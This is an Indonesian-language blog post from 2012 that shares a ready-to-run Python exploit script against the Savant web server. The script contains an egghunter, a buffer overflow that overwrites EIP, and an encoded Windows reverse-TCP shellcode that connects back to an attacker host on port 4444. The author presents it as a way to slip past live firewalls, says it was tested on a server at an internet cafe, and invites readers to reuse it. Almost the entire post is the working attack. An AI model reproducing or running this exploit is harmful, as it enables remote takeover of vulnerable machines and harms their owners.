ShellCode badbuffer

Disini gw mau share shellcode sebener nya shellcode ini punya temen gw Red-Dragon dari HN tapi sudah gw edit
kegunaan nya buat encrypt payload dan nembus firewall yang idup
ini gw tess dengan server gw di warnet dan ternyata wew tembus ^__^
silahkan di edit lagi tapi mohon jangan mengaku copyrigth soal nya saya gak ngaku copyrigth dalam post ini ^__^

cekidot shellcode nya

#!/usr/bin/python
import socket

target_address="192.168.1.100"
target_port=80

buffer2 = "R0cX" + "R0cX"
# msfpayload windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c
buffer2 += ("\xdb\xc4\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x5d\xbb\x4d\xf5\xfa"
"\x3e\x31\x58\x1a\x83\xc0\x04\x03\x58\x16\xe2\xb8\x2c\x3a\xe7"
"\x36\xeb\x4f\xa7\x91\x16\xc4\x01\x85\xeb\xd2\x03\x62\x8f\x0d"
"\x9f\xbd\xf7\xde\x63\xe2\xf1\x68\x4f\x5a\xe3\xfe\x2b\x3e\x31"
"\x85\xb0\x17\x8c\x0b\x49\x9f\x2b\x21\x14\x94\xff\x8f\xf6\x7c"
"\x2c\x34\x58\x19\x99\x7c\x05\xfc\x22\xf8\x67\x0c\xdd\x5c\x2c"
"\x3f\x9e\x0b\x60\x62\x06\xa4\xef\xe3\xae\xff\x61\x2e\x04\x3d"
"\x99\x0c\x46\x50\x79\xc5\xfa\x72\xc7\x57\x09\x17\x3d\xee\xc3"
"\x3c\x46\x1a\x33\x2e\x32\xa4\xb0\xbd\x5f\x8d\xa1\x61\xd2\xf2"
"\x0a\xe2\x2c\x43\x62\xc8\xcf\xbf\x9e\x7a\xae\x85\x8c\xf7\x44"
"\x5f\x0f\xf8\x65\xf7\x45\xb3\xd5\x23\x62\x56\xda\x8c\x99\x91"
"\x54\x59\x66\xe5\x3b\x31\x1e\xb9\xc5\x1e\x23\x1c\xcc\xea\x4b"
"\xe1\x09\x74\x52\x60\xd4\x41\x46\xd7\xcd\xe9\x0f\xde\xa3\x8a"
"\x69\x84\x88\x67\x31\xcd\x5c\xca\x49\x49\x43\x15\x7d\x49\x9c"
"\xdb\xf0\x37\x89\x6f\xeb\x1c\x07\x84\xb3\x9a\x67\x4c\x77\x62"
"\x67\x66\x2a\x49\xba\xf6\xa6\x74\x16\xb0\x7f\x69\x4d\xc5\x6d"
"\xc6\x38\xcd\x63\x35\xa2\x38\x5c\x55\xcf\x6c\x6f\xa8\x0c\x09"
"\xcd\x3c\x85\xec\xad\xe3\x55\xe4\xfa\xac\x13\xfc\x7a\x54\xa3"
"\xe1\x45\xad\x79\xc6\x12\xcf\xe9\x7c\x5f\x06\xeb\x19\xd4\xfe"
"\xc9\x75\x43\x4c\x08\xb0\xef\xc8\x04\x8a\x16\x43\x16\xcf\x63"
"\x06\xfd\x41\x99\x74\x3c\x3c\x53\xd6\x16\x36\x98\xc2\xbf\x4c"
"\x0b\xb7\xc7\xef\x98\xf3\x7b\xfb\xcf\xc5\x61\x0b\xaa\x38\x8d"
"\x0e\x5a\x77\xa1\x9c\xde\x08\x32\x8c\xa0\xa3\xbe\xd2\xad\x69"
"\x92\x9e\x67\xbe\xc0\x1e\x00\x17\xb7\x9f\x3a\xc1\x51\xdc\xb3"
"\x5d\xdc\x4e\x85\x91\xdb\x42\xba\x70\x3f\x0b\x9c\x01\x84\x67"
"\x20\x45\x2a\xba\x15\xf8\xa5\xd8\x07\x17\x87\x36\x96\xbb\x11"
"\xbc\x58\x30\x36\x5c\x30\xb3\x71")

badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30 \x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # egghunter searching for R0cX
badbuffer += "\x90" * (254 - len(badbuffer))
badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN
httpmethod = "\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14

sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(sendbuf)
sock.close()

semoga bermanfaat buat kawan2 ^__^

sumber :http://central-cyber2.blogspot.com/

NAMMASTTE

ShellCode badbuffer

Written By nAmmAsttE on Jumat, 23 Maret 2012 | 22.23

0 komentar:

Speak up your mind

Random Post

Recent Post

Popular Posts

Comments